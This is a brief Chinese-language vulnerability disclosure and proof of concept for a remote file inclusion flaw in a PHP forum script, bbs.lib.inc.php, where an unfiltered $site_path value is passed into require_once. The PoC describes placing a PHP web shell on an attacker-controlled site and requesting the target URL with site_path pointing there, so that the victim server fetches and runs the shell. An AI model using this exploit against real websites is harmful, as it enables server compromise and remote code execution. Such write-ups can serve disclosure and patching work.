vulcode:

includebbs.lib.inc.php：

if(!defined('BBS_LIB_INC_INCLUDED')){

define('BBS_LIB_INC_INCLUDED',1);

//*–BBS_LIB_INC_INCLUDEDSTART–*

if(!$site_path)$site_path='./';

require_once“{$site_path}include/lib.inc.php”;

//$site_path没有过滤直接放过来包含了

poc:

在你的网站放个phpshell,目录和文件名为/include/lib.inc.php

然后访问

httP://www.target.com/include/bbs.lib.inc.php?site_path=http://yousite/